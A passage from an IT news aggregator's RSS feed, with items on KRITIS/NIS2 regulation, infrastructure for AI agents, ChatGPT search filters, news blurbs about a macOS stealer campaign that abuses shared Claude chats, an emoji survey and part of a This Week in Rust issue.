<p>Wenn sich jedoch herausstellt, dass ihr aktueller Laptop an seine Grenzen stößt, dann finden Sie in unseren <a href="https://www.pcwelt.de/bestenlisten/laptops" target="_blank" rel="noreferrer noopener">Bestenlisten</a> die lohnenswertesten Modelle für jeden Geldbeutel. Suchen Sie nach einem <a href="https://www.pcwelt.de/article/1204273/die-besten-laptops-fuer-studenten-und-schueler-im-test.html" target="_blank" rel="noreferrer noopener">Laptop für Schüler oder Studenten</a>? Oder soll es lieber ein <a href="https://www.pcwelt.de/article/2504193/test-die-besten-gaming-laptops-unter-1200-euro.html" target="_blank" rel="noreferrer noopener">Gaming-Laptop für unter 1.200 Euro</a> sein? <a href="https://www.pcwelt.de/article/2215385/die-besten-laptops-test.html" target="_blank" rel="noreferrer noopener">Die besten Notebooks aller Klassen</a> haben wir ebenfalls einem Vergleich unterzogen.</p>



<p>In jedem Fall gilt: <a href="https://www.pcwelt.de/article/2639709/nicht-wegwerfen-fuenf-geniale-ideen-fuer-alte-notebook-laptops-weiternutzung.html" target="_blank" rel="noreferrer noopener">Werfen Sie Ihren alten Laptop bloß nicht weg, sondern machen Sie stattdessen das damit!</a></p>

</div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Wie hängen eigentlich das #KRITIS-Dachgesetz und #NIS2 zusammen?]]></title>
<description><![CDATA[Author: Security-Insider - Bewertung: 0x - Views:0 Diese Frage beantwortet Dr. Daniel Meßmer in der aktuellen Folge des Security-Insider Podcast.

Seine Einordnung: Das KRITIS-Dachgesetz ersetzt NIS 2 nicht. Beide Regelwerke stehen nebeneinander und gelten parallel. Während NIS 2 beziehungsweise ...]]></description>
<link>https://tsecurity.de/de/3672959/it-security-video/wie-haengen-eigentlich-das-kritis-dachgesetz-und-nis2-zusammen/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3672959/it-security-video/wie-haengen-eigentlich-das-kritis-dachgesetz-und-nis2-zusammen/</guid>
<pubDate>Thu, 16 Jul 2026 11:32:42 +0200</pubDate>
<category>🎥 IT Security Video</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Author: Security-Insider - Bewertung: 0x - Views:0 <br/></p><p><iframe id="ytplayer" loading="lazy" type="text/html" width="100%" height="auto" src="https://www.youtube.com/embed/GvCumS7fN5Y?autoplay=1&origin=http://tsecurity.de" frameborder="0"></iframe></p><p>Diese Frage beantwortet Dr. Daniel Meßmer in der aktuellen Folge des Security-Insider Podcast.<br />
<br />
Seine Einordnung: Das KRITIS-Dachgesetz ersetzt NIS 2 nicht. Beide Regelwerke stehen nebeneinander und gelten parallel. Während NIS 2 beziehungsweise die Umsetzung über das BSI-Gesetz vor allem auf Cybersicherheit abzielt, geht es beim KRITIS-Dachgesetz primär um die physische Resilienz kritischer Anlagen.<br />
<br />
Also nicht nur: Was passiert, wenn ein IT-System angegriffen wird?<br />
Sondern auch: Was passiert, wenn Stromnetze ausfallen, Wasserwerke nicht mehr funktionieren oder Logistiksysteme zusammenbrechen?<br />
<br />
Genau hier setzt das KRITIS-Dachgesetz an. Es soll Risiken für das Gemeinwohl eindämmen, die durch den Ausfall physischer Infrastrukturen entstehen können, etwa durch Naturkatastrophen, Hochwasser oder andere physische Bedrohungen.<br/></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[New agentic compute patterns]]></title>
<description><![CDATA[For a decade, Kubernetes was the right answer. It organized containers, scaled services horizontally and gave platform teams a shared vocabulary for running software in production. It abstracted away enough of the underlying complexity that engineers could stop thinking about servers and start th...]]></description>
<link>https://tsecurity.de/de/3672922/ai-nachrichten/new-agentic-compute-patterns/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3672922/ai-nachrichten/new-agentic-compute-patterns/</guid>
<pubDate>Thu, 16 Jul 2026 11:19:03 +0200</pubDate>
<category>🔧 AI Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph">For a decade, Kubernetes was the right answer. It organized containers, scaled services horizontally and gave platform teams a shared vocabulary for running software in production. It abstracted away enough of the underlying complexity that engineers could stop thinking about servers and start thinking about services. Most cloud-native infrastructure today is built on top of it, directly or in spirit, and EKS made that model the default for the majority of enterprise teams running workloads on AWS.</p>



<p class="wp-block-paragraph">The workload that defined that era was the stateless HTTP request, fast in, fast out, disposable. A user action triggers a request, the request hits a service, the service returns a response and the container is done. Kubernetes was optimized for that pattern down to the scheduler internals: Bin-pack containers onto nodes, autoscale on CPU and memory, evict and reschedule when something goes wrong. The whole system is tuned around the assumption that individual units of work are short, stateless and interchangeable.</p>



<p class="wp-block-paragraph">That assumption no longer holds for the workloads that matter most right now.</p>



<h2 class="wp-block-heading">The agent workload is structurally different</h2>



<p class="wp-block-paragraph">Agents are long-running, stateful processes. They reason across time, call external tools, spawn subprocesses, write and execute code, and make decisions that depend on what happened five steps earlier in the same task. A single-agent workflow might run for minutes or hours, touching a dozen external systems and generating intermediate outputs that subsequent steps depend on. The compute layer for that kind of work needs to do things the old model was never asked to do. That is the new pattern: Execution infrastructure designed around agent semantics rather than request semantics.</p>



<p class="wp-block-paragraph">The Kubernetes community itself has acknowledged this mismatch. In March 2026, Kubernetes SIG Apps published an<a href="https://url.usb.m.mimecastprotect.com/s/U22qCA8LmLh7yY0jIGfGfGdvGo?domain=kubernetes.io/" target="_blank" rel="noreferrer noopener"> introduction to Agent Sandbox</a>, a new CRD-based abstraction designed specifically for singleton, stateful agent workloads. The framing is direct: The ecosystem is moving from short-lived, isolated tasks to deploying multiple, coordinated AI agents that run continuously, and mapping those workloads to traditional Kubernetes primitives requires an entirely new abstraction. The fact that the Kubernetes maintainers built a dedicated primitive for this, rather than recommending teams compose one from existing resources, is itself the clearest signal that agent execution does not fit the old model.</p>



<h2 class="wp-block-heading">What agent execution actually requires</h2>



<p class="wp-block-paragraph">Concretely, it requires four things. First, isolated execution environments that provision in milliseconds, not minutes, so each agent task gets its own sandbox for code execution and tool calls without blocking the reasoning loop. The difference between a two-second environment and a two-minute environment is not a performance optimization; it determines whether the architecture is viable at all. Second, durable state management across the full task lifecycle, so an agent can pause, hand off or resume without re-initializing from scratch and burning tokens to reconstruct context it already built. Third, coordination primitives for multi-agent work: The ability to spawn subagents, pass structured outputs between them and track task dependencies across a graph of concurrent processes. Production agent systems are rarely single agents; they are pipelines of specialized agents with handoffs that need to be reliable and inspectable. Fourth, credentials and secrets management that travel with the execution context, so agents can authenticate to external services securely without exposing credentials in the task definition, logs or the environment variables of a shared container.</p>



<h2 class="wp-block-heading">The mismatch shows up fast in production</h2>



<p class="wp-block-paragraph">Kubernetes and EKS expose the mismatch quickly in practice. Pod eviction terminates an agent mid-task with no clean recovery path. Autoscaling reads CPU utilization as the load signal, but an agent holding a long inference connection looks idle to the scheduler even when it is doing the most consequential work in the pipeline. Provisioning a new environment takes 45 seconds to two minutes on a well-tuned cluster; agent workloads need that in under two seconds or the reasoning loop stalls and the user experience degrades visibly. These are not edge cases or misconfigurations. They are the normal operating conditions for production agent workloads running on infrastructure that was not designed for them.</p>



<p class="wp-block-paragraph">The utilization data makes the broader cost picture even starker. The<a href="https://url.usb.m.mimecastprotect.com/s/zk-6CB1MnMHEQoqvI6hNf2eRQz?domain=cast.ai/" target="_blank" rel="noreferrer noopener"> 2026 State of Kubernetes Optimization Report</a> from CAST AI, drawn from analysis of over 23,000 production clusters across AWS, Azure and GCP, found average CPU utilization at 8 percent, down from 10 percent the year prior. Memory utilization fell from 23 to 20 percent. CPU overprovisioning jumped from 40 to 69 percent year over year. These numbers reflect clusters running traditional workloads, and the pattern is worsening, not improving, as environments scale. Agent workloads compound this problem further. An agent holding an open inference connection or waiting on a tool call registers as idle to a scheduler that reads CPU and memory as the only meaningful load signals. The infrastructure responds to the wrong metric, overprovisioning capacity for demand it cannot measure, while the actual bottleneck, environment provisioning latency and state continuity, goes unaddressed.</p>



<h2 class="wp-block-heading">Security is not the same problem it was before</h2>



<p class="wp-block-paragraph">Agent workloads change the threat model at the infrastructure level. A compromised stateless service exposes a narrow surface defined by its API contracts. A compromised agent exposes every system it can reach, every credential it holds and every action it is authorized to take on behalf of the user. Agents generate and execute their own code, make non-deterministic tool-call decisions and accumulate context across long-running sessions. Standard container namespacing does not contain that kind of risk. Kernel-level isolation, default-deny network egress, scoped credentials per session and agent-aware observability are not optional hardening steps. They are baseline requirements for running agents in production.</p>



<h2 class="wp-block-heading">What teams that ship agents have already figured out</h2>



<p class="wp-block-paragraph">Some of the clearest evidence for this shift comes not from infrastructure vendors but from product engineering teams running agents at scale on their own code. In late 2025, Ramp’s engineering team published a<a href="https://url.usb.m.mimecastprotect.com/s/Co8bCDwO0Ohg2PpXhAiRfjbcM8?domain=engineering.ramp.com" target="_blank" rel="noreferrer noopener"> detailed account of building Inspect</a>, their internal background coding agent. Each Inspect session runs in a sandboxed VM with a full-stack development environment and deep integrations across their observability, CI, and deployment tooling. The architecture requirements map almost exactly to the four primitives above. Filesystem snapshots keep sessions starting in seconds rather than minutes. Sessions are isolated and stateful. The agent can run tests, review telemetry, query feature flags and visually verify frontend changes in a real browser. And the whole system supports unlimited concurrency, so engineers can spin up ten parallel sessions exploring different approaches to the same problem without contention.</p>



<p class="wp-block-paragraph">The results speak for themselves. Within months of launch, roughly 30 percent of all pull requests merged to Ramp’s frontend and backend repositories were written by Inspect. That level of adoption was not mandated. It happened because the execution environment was fast enough, capable enough and well-integrated enough that the agent was strictly better than a local workflow for a meaningful share of tasks. The key insight from the Ramp case is not about the model. It is about the execution layer. As their team put it, session speed should only be limited by model-provider time-to-first-token; everything else, like cloning and installing, needs to be done before the session starts. That is a statement about infrastructure, not intelligence.</p>



<h2 class="wp-block-heading">The ecosystem is catching up, but defaults are sticky</h2>



<p class="wp-block-paragraph">None of that is a criticism of the tools. Kubernetes solved exactly the problem it was designed for, and it solved it well. The issue is that infrastructure defaults are sticky. Teams inherit them, build on top of them and optimize within their constraints long after the underlying workload has changed. The Kubernetes community’s own response, the<a href="https://url.usb.m.mimecastprotect.com/s/U22qCA8LmLh7yY0jIGfGfGdvGo?domain=kubernetes.io/" target="_blank" rel="noreferrer noopener"> Agent Sandbox project under SIG Apps</a>, validates the thesis that a new abstraction is necessary. The new primitives the community is building include warm pools for near-zero cold starts, lifecycle management for suspending and resuming idle agents without losing state, and pluggable kernel isolation for secure execution of untrusted code. These are not incremental improvements to existing resources. They are net-new abstractions that acknowledge the old model does not stretch to fit.</p>



<p class="wp-block-paragraph">But adoption of purpose-built agent infrastructure remains early. Enterprises building agent pipelines today are largely running a request-oriented orchestration model against an execution-oriented workload, and the mismatch shows up in task failure rates, runaway costs and debugging cycles that have no good tooling because the observability layer was also designed for stateless services.</p>



<h2 class="wp-block-heading">The structural advantage is available now</h2>



<p class="wp-block-paragraph">The infrastructure to close that gap exists now. The prerequisite is recognizing that agent execution is a first-class compute pattern with its own primitives and its own requirements, not a variant of the stateless service model that defined the last decade. Teams that make that shift early will have a meaningful structural advantage. The ones that do not will spend the next two years wondering why their agent systems are unreliable at a scale that should be tractable.</p>



<p class="wp-block-paragraph"><strong>This article is published as part of the Foundry Expert Contributor Network.</strong><br><a href="https://www.cio.com/expert-contributor-network/"><strong>Want to join?</strong></a></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Chats, Bilder, Dokumente: So findet ihr in ChatGPT künftig schneller, was ihr sucht]]></title>
<description><![CDATA[Die Suche im Chat wird dank Filtern deutlich übersichtlicher für ChatGPT-User – im Web, auf iOS und Android. Was sich jetzt ändert.
weiterlesen auf t3n.de]]></description>
<link>https://tsecurity.de/de/3672912/it-nachrichten/chats-bilder-dokumente-so-findet-ihr-in-chatgpt-kuenftig-schneller-was-ihr-sucht/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3672912/it-nachrichten/chats-bilder-dokumente-so-findet-ihr-in-chatgpt-kuenftig-schneller-was-ihr-sucht/</guid>
<pubDate>Thu, 16 Jul 2026 11:18:07 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Die Suche im Chat wird dank Filtern deutlich übersichtlicher für ChatGPT-User – im Web, auf iOS und Android. Was sich jetzt ändert.
<a href="https://t3n.de/news/chats-bilder-dokumente-so-findet-ihr-in-chatgpt-kuenftig-schneller-was-ihr-sucht-1753048/?utm_source=rss&amp;utm_medium=newsFeed&amp;utm_campaign=newsFeed">weiterlesen auf t3n.de</a>]]></content:encoded>
</item>
<item>
<title><![CDATA[ClaudeFix Campaign Abuses Shared Claude Chats to Deliver MacSync Stealer]]></title>
<description><![CDATA[A new ClickFix campaign that abuses Anthropic’s Claude platform to distribute MacSync Stealer, a macOS-targeted information stealer capable of harvesting credentials, sensitive files, and cryptocurrency wallet data. The campaign, dubbed “ClaudeFix” internally by Zscaler, marks a notable evolution...]]></description>
<link>https://tsecurity.de/de/3672721/it-security-nachrichten/claudefix-campaign-abuses-shared-claude-chats-to-deliver-macsync-stealer/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3672721/it-security-nachrichten/claudefix-campaign-abuses-shared-claude-chats-to-deliver-macsync-stealer/</guid>
<pubDate>Thu, 16 Jul 2026 09:53:58 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>A new ClickFix campaign that abuses Anthropic’s Claude platform to distribute MacSync Stealer, a macOS-targeted information stealer capable of harvesting credentials, sensitive files, and cryptocurrency wallet data. The campaign, dubbed “ClaudeFix” internally by Zscaler, marks a notable evolution in ClickFix tactics, replacing typical fake CAPTCHA or browser error lures with shared Claude chat links to […]</p>
<p>The post <a href="https://cyberpress.org/claudefix-campaign-claude-macsync-stealer/">ClaudeFix Campaign Abuses Shared Claude Chats to Deliver MacSync Stealer</a> appeared first on <a href="https://cyberpress.org/">Cyber Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Hackers Use Google Ads and Claude AI Chats to Steal macOS Credentials and Crypto Wallets]]></title>
<description><![CDATA[Threat actors have exploited Google Ads and Anthropic’s Claude shared-chat feature to distribute the MacSync Stealer to macOS users. They used a social engineering technique called ClickFix, designed to steal credentials, browser data, cloud keys, sensitive files, and cryptocurrency wallets.…
Rea...]]></description>
<link>https://tsecurity.de/de/3672550/it-security-nachrichten/hackers-use-google-ads-and-claude-ai-chats-to-steal-macos-credentials-and-crypto-wallets/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3672550/it-security-nachrichten/hackers-use-google-ads-and-claude-ai-chats-to-steal-macos-credentials-and-crypto-wallets/</guid>
<pubDate>Thu, 16 Jul 2026 08:37:48 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Threat actors have exploited Google Ads and Anthropic’s Claude shared-chat feature to distribute the MacSync Stealer to macOS users. They used a social engineering technique called ClickFix, designed to steal credentials, browser data, cloud keys, sensitive files, and cryptocurrency wallets.…</p>
<p class="more-link-p"><a class="more-link" href="https://www.itsecuritynews.info/hackers-use-google-ads-and-claude-ai-chats-to-steal-macos-credentials-and-crypto-wallets/">Read more →</a></p>
<p>The post <a href="https://www.itsecuritynews.info/hackers-use-google-ads-and-claude-ai-chats-to-steal-macos-credentials-and-crypto-wallets/">Hackers Use Google Ads and Claude AI Chats to Steal macOS Credentials and Crypto Wallets</a> appeared first on <a href="https://www.itsecuritynews.info/">IT Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Bitkom-Umfrage: 9 von 10 Deutschen nutzen Emojis – aber nicht alle verstehen sie]]></title>
<description><![CDATA[Lachen, Herzen, Zwinkern: Emojis werden in Chats häufig benutzt. Die Gen-Z sendet sie fast immer, Boomer tun es seltener. Viele sind unsicher, was manche bedeuten.weiterlesen auf t3n.de]]></description>
<link>https://tsecurity.de/de/3672546/it-nachrichten/bitkom-umfrage-9-von-10-deutschen-nutzen-emojis-aber-nicht-alle-verstehen-sie/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3672546/it-nachrichten/bitkom-umfrage-9-von-10-deutschen-nutzen-emojis-aber-nicht-alle-verstehen-sie/</guid>
<pubDate>Thu, 16 Jul 2026 08:33:01 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Lachen, Herzen, Zwinkern: Emojis werden in Chats häufig benutzt. Die Gen-Z sendet sie fast immer, Boomer tun es seltener. Viele sind unsicher, was manche bedeuten.<a href="https://t3n.de/news/bitkom-umfrage-9-von-10-deutschen-nutzen-emojis-aber-nicht-alle-verstehen-sie-1753018/?utm_source=rss&amp;utm_medium=newsFeed&amp;utm_campaign=newsFeed">weiterlesen auf t3n.de</a>]]></content:encoded>
</item>
<item>
<title><![CDATA[Hackers Use Google Ads and Claude AI Chats to Steal macOS Credentials and Crypto Wallets]]></title>
<description><![CDATA[Threat actors have exploited Google Ads and Anthropic’s Claude shared-chat feature to distribute the MacSync Stealer to macOS users. They used a social engineering technique called ClickFix, designed to steal credentials, browser data, cloud keys, sensitive files, and cryptocurrency wallets. Acco...]]></description>
<link>https://tsecurity.de/de/3672525/it-security-nachrichten/hackers-use-google-ads-and-claude-ai-chats-to-steal-macos-credentials-and-crypto-wallets/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3672525/it-security-nachrichten/hackers-use-google-ads-and-claude-ai-chats-to-steal-macos-credentials-and-crypto-wallets/</guid>
<pubDate>Thu, 16 Jul 2026 08:24:00 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Threat actors have exploited Google Ads and Anthropic’s Claude shared-chat feature to distribute the MacSync Stealer to macOS users. They used a social engineering technique called ClickFix, designed to steal credentials, browser data, cloud keys, sensitive files, and cryptocurrency wallets. According to Zscaler Threat Hunting, this campaign took place between June 12 and June 19, […]</p>
<p>The post <a href="https://gbhackers.com/hackers-use-google-ads-and-claude-ai-chats-to-steal-macos-credentials/">Hackers Use Google Ads and Claude AI Chats to Steal macOS Credentials and Crypto Wallets</a> appeared first on <a href="https://gbhackers.com/">GBHackers Security | #1 Globally Trusted Cyber Security News Platform</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[This Week In Rust: This Week in Rust 660]]></title>
<description><![CDATA[Hello and welcome to another issue of This Week in Rust!
Rust is a programming language empowering everyone to build reliable and efficient software.
This is a weekly summary of its progress and community.
Want something mentioned? Tag us at
@thisweekinrust.bsky.social on Bluesky or
@ThisWeekinRu...]]></description>
<link>https://tsecurity.de/de/3672376/tools/this-week-in-rust-this-week-in-rust-660/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3672376/tools/this-week-in-rust-this-week-in-rust-660/</guid>
<pubDate>Thu, 16 Jul 2026 07:09:13 +0200</pubDate>
<category>💾  Tools</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Hello and welcome to another issue of <em>This Week in Rust</em>!
<a href="https://www.rust-lang.org/">Rust</a> is a programming language empowering everyone to build reliable and efficient software.
This is a weekly summary of its progress and community.
Want something mentioned? Tag us at
<a href="https://bsky.app/profile/thisweekinrust.bsky.social">@thisweekinrust.bsky.social</a> on Bluesky or
<a href="https://mastodon.social/@thisweekinrust">@ThisWeekinRust</a> on mastodon.social, or
<a href="https://github.com/rust-lang/this-week-in-rust">send us a pull request</a>.
Want to get involved? <a href="https://github.com/rust-lang/rust/blob/main/CONTRIBUTING.md">We love contributions</a>.</p>
<p><em>This Week in Rust</em> is openly developed <a href="https://github.com/rust-lang/this-week-in-rust">on GitHub</a> and archives can be viewed at <a href="https://this-week-in-rust.org/">this-week-in-rust.org</a>.
If you find any errors in this week's issue, <a href="https://github.com/rust-lang/this-week-in-rust/pulls">please submit a PR</a>.</p>
<p>Want TWIR in your inbox? <a href="https://this-week-in-rust.us11.list-manage.com/subscribe?u=fd84c1c757e02889a9b08d289&amp;id=0ed8b72485">Subscribe here</a>.</p>
<h4><a class="toclink" href="https://this-week-in-rust.org/atom.xml#updates-from-rust-community">Updates from Rust Community</a></h4>


<h5><a class="toclink" href="https://this-week-in-rust.org/atom.xml#official">Official</a></h5>
<ul>
<li><a href="https://blog.rust-lang.org/2026/07/09/Rust-1.97.0/">Announcing Rust 1.97.0</a></li>
<li><a href="https://blog.rust-lang.org/2026/07/13/crates-io-development-update/">crates.io: development update</a></li>
</ul>
<h5><a class="toclink" href="https://this-week-in-rust.org/atom.xml#projecttooling-updates">Project/Tooling Updates</a></h5>
<ul>
<li><a href="https://bun.com/blog/bun-in-rust">Rewriting Bun in Rust</a></li>
<li><a href="https://bullmq.io/news/260712/rust-release/">Announcing BullMQ for Rust</a></li>
<li><a href="https://github.com/zs-dima/prost-protovalidate/releases/tag/v0.6.0">prost-protovalidate 0.6 — buf.validate (protovalidate) for prost and buffa: compile-time codegen + runtime CEL, 2872/2872 conformance</a></li>
<li><a href="https://github.com/StaszeKrk/plaza/releases/tag/v1.0.0">plaza 1.0: a ratatui package-manager TUI that searches pacman, the AUR, apt, dnf, and Flatpak at once</a></li>
<li><a href="https://github.com/danube-messaging/danube/releases/tag/v0.15.1">Danube v0.15.1: native Apache Iceberg integration for streaming-to-lakehouse export</a></li>
<li><a href="https://www.willsearch.com.br/sentinel/">Guardian Sentinel. The Terminal User Interface for Guardian Decentralized Database - P2P</a></li>
<li><a href="https://github.com/kunobi-ninja/kobe/releases/tag/v0.33.0">kobe 0.33.0: a Rust operator for instant CI Kubernetes clusters</a></li>
<li><a href="https://navigatorbuilds.github.io/elara-mesh/blog/black-box-for-ai-agents.html">Elara Mesh: what the black box for AI agents actually does</a></li>
<li>
<p><a href="https://github.com/kunobi-ninja/kache/releases/tag/v0.10.0">kache 0.10.0: instant download dedup, no more polling</a></p>
</li>
<li>
<p><a href="https://richer-richard.github.io/cochlea/">cochlea 0.1.0: a headless, deterministic audio engine for AI agents</a></p>
</li>
</ul>
<h5><a class="toclink" href="https://this-week-in-rust.org/atom.xml#observationsthoughts">Observations/Thoughts</a></h5>
<ul>
<li><a href="https://opensourcesecurity.io/2026/2026-07-rfmf-lori-niko/">Open Source Security Podcast: Rust Foundation Maintainers Fund with Lori and Niko</a></li>
<li><a href="https://pulsebeam.dev/blog/moving-to-thread-per-core">Moving a Rust WebRTC SFU to thread-per-core</a></li>
<li><a href="https://abundance.build/blog/2026-07-11-faster-rust-tests-in-ci-with-parallel-steps/">Faster Rust tests in CI with parallel steps</a></li>
<li>[video] <a href="https://www.youtube.com/watch?v=fugcSHD-9Jw">The Only Diagram You Need to Understand Rust Ownership</a></li>
<li><a href="https://encore.dev/blog/typescript-parser-wasm">We compiled our TypeScript parser to WASM</a></li>
<li><a href="https://kerkour.com/rust-hype">Understanding the Rust hype for the busy developer</a></li>
<li><a href="https://dev.to/akavlabs_69/i-red-teamed-my-own-llm-security-gateway-in-four-passes-heres-every-gap-i-found-5cl9">I red-teamed my own LLM security gateway (Rust) in four passes — every detection gap and how I closed it</a></li>
</ul>
<h5><a class="toclink" href="https://this-week-in-rust.org/atom.xml#rust-walkthroughs">Rust Walkthroughs</a></h5>
<ul>
<li>[video] <a href="https://www.youtube.com/watch?v=DJhhy6YQe8k">Backend Concepts in Rust: HTTP Servers</a></li>
<li><a href="https://dystroy.org/blog/picamobile/">Fearless Embedded Rust: A FPV Lego car</a></li>
<li><a href="https://www.aravpanwar.com/writing/building-decayfmt-in-rust/">What I learned building a self-corrupting file format in Rust</a></li>
<li><a href="https://corentin-core.github.io/posts/ruxe-async-runtime-agnostic/">Come Async You Are</a></li>
</ul>
<h5><a class="toclink" href="https://this-week-in-rust.org/atom.xml#miscellaneous">Miscellaneous</a></h5>
<ul>
<li><a href="https://blog.theembeddedrustacean.com/oxidize-xiao">Oxidize XIAO — An Embedded Rust Community Program</a></li>
</ul>
<h4><a class="toclink" href="https://this-week-in-rust.org/atom.xml#crate-of-the-week">Crate of the Week</a></h4>
<p>This week's crate is <a href="https://crates.io/crates/dashu">dashu</a>, a pure Rust set of libraries of arbitrary precision numbers.</p>
<p>Thanks to <a href="https://users.rust-lang.org/t/crate-of-the-week/2704/1628">JacobZ</a> for the self-suggestion!</p>
<p><a href="https://users.rust-lang.org/t/crate-of-the-week/2704">Please submit your suggestions and votes for next week</a>!</p>
<h4><a class="toclink" href="https://this-week-in-rust.org/atom.xml#calls-for-testing">Calls for Testing</a></h4>
<p>An important step for RFC implementation is for people to experiment with the
implementation and give feedback, especially before stabilization.</p>
<p>If you are a feature implementer and would like your RFC to appear in this list, add a
<code>call-for-testing</code> label to your RFC along with a comment providing testing instructions and/or
guidance on which aspect(s) of the feature need testing.</p>
<p><em>No calls for testing were issued this week by
<a href="https://github.com/rust-lang/rust/issues?q=state%3Aopen%20label%3Acall-for-testing%20state%3Aopen">Rust</a>,
<a href="https://github.com/rust-lang/cargo/issues?q=state%3Aopen%20label%3Acall-for-testing%20state%3Aopen">Cargo</a>,
<a href="https://github.com/rust-lang/rustup/issues?q=state%3Aopen%20label%3Acall-for-testing%20state%3Aopen">Rustup</a> or
<a href="https://github.com/rust-lang/rfcs/issues?q=label%3Acall-for-testing%20state%3Aopen">Rust language RFCs</a>.</em></p>
<p><a href="https://github.com/rust-lang/this-week-in-rust/issues">Let us know</a> if you would like your feature to be tracked as a part of this list.</p>
<h4><a class="toclink" href="https://this-week-in-rust.org/atom.xml#call-for-participation-projects-and-speakers">Call for Participation; projects and speakers</a></h4>
<h5><a class="toclink" href="https://this-week-in-rust.org/atom.xml#cfp-projects">CFP - Projects</a></h5>
<p>Always wanted to contribute to open-source projects but did not know where to start?
Every week we highlight some tasks from the Rust community for you to pick and get started!</p>
<p>Some of these tasks may also have mentors available, visit the task page for more information.</p>



<ul>
<li><a href="https://github.com/supernovae-st/nika/issues/424">Nika - showcase: CSV → chart PNG → markdown report (nika:chart has no example yet)</a></li>
</ul>


<p>If you are a Rust project owner and are looking for contributors, please submit tasks <a href="https://github.com/rust-lang/this-week-in-rust?tab=readme-ov-file#call-for-participation-guidelines">here</a> or through a <a href="https://github.com/rust-lang/this-week-in-rust">PR to TWiR</a> or by reaching out on <a href="https://bsky.app/profile/thisweekinrust.bsky.social">Bluesky</a> or <a href="https://mastodon.social/@thisweekinrust">Mastodon</a>!</p>
<h5><a class="toclink" href="https://this-week-in-rust.org/atom.xml#cfp-events">CFP - Events</a></h5>
<p>Are you a new or experienced speaker looking for a place to share something cool? This section highlights events that are being planned and are accepting submissions to join their event as a speaker.</p>



<p>If you are an event organizer hoping to expand the reach of your event, please submit a link to the website through a <a href="https://github.com/rust-lang/this-week-in-rust">PR to TWiR</a> or by reaching out on <a href="https://bsky.app/profile/thisweekinrust.bsky.social">Bluesky</a> or <a href="https://mastodon.social/@thisweekinrust">Mastodon</a>!</p>
<h4><a class="toclink" href="https://this-week-in-rust.org/atom.xml#updates-from-the-rust-project">Updates from the Rust Project</a></h4>
<p>550 pull requests were <a href="https://github.com/search?q=is%3Apr+org%3Arust-lang+is%3Amerged+merged%3A2026-07-07..2026-07-14">merged in the last week</a></p>
<h6><a class="toclink" href="https://this-week-in-rust.org/atom.xml#compiler">Compiler</a></h6>
<ul>
<li><a href="https://github.com/rust-lang/rust/pull/158931">inline some <code>Symbol</code> functions</a></li>
<li><a href="https://github.com/rust-lang/rust/pull/157104">predicate/clause cleanups</a></li>
<li><a href="https://github.com/rust-lang/rust/pull/158942">remove some AST <code>tokens</code> fields</a></li>
<li><a href="https://github.com/rust-lang/rust/pull/159019">resolver: wrap arenas in <code>WorkerLocal</code></a></li>
<li><a href="https://github.com/rust-lang/rust/pull/158794">rework read deduplication with pooled read recorders</a></li>
<li><a href="https://github.com/rust-lang/rust/pull/159012">shrink <code>mir::Statement</code> to 40 bytes</a></li>
<li><a href="https://github.com/rust-lang/rust/pull/157491">shrink no-op drop elaboration</a></li>
<li><a href="https://github.com/rust-lang/rust/pull/158865">specialize common <code>(1, 1)</code> case for arg unification</a></li>
<li><a href="https://github.com/rust-lang/rust/pull/158842">use SmallVec for return places in MIR</a></li>
</ul>
<h6><a class="toclink" href="https://this-week-in-rust.org/atom.xml#library">Library</a></h6>
<ul>
<li><a href="https://github.com/rust-lang/rust/pull/158866">add explicit <code>Iterator::count</code> impl for <code>ChunkBy</code></a></li>
<li><a href="https://github.com/rust-lang/rust/pull/157153">allow <code>Allocator</code>s to be used as <code>#[global_allocator]</code>s</a></li>
<li><a href="https://github.com/rust-lang/rust/pull/158876">fix multiple logic bugs in <code>Arc::make_mut</code></a></li>
<li><a href="https://github.com/rust-lang/rust/pull/158940">implement feature <code>char_to_u32</code></a></li>
<li><a href="https://github.com/rust-lang/rust/pull/159092">make volatile operations const</a></li>
<li><a href="https://github.com/rust-lang/rust/pull/158541">move <code>std::io::Write</code> to <code>core::io</code></a></li>
<li><a href="https://github.com/rust-lang/rust/pull/159099">stabilize <code>String::from_utf8_lossy_owned</code></a></li>
<li><a href="https://github.com/rust-lang/rust/pull/151379">stabilize <code>VecDeque::retain_back</code> from <code>truncate_front</code></a></li>
</ul>
<h6><a class="toclink" href="https://this-week-in-rust.org/atom.xml#cargo">Cargo</a></h6>
<ul>
<li><a href="https://github.com/rust-lang/cargo/pull/17199"><code>install</code>: Move --debug to Compilation options</a></li>
<li><a href="https://github.com/rust-lang/cargo/pull/17204"><code>source</code>: incorrect duplicate package warning</a></li>
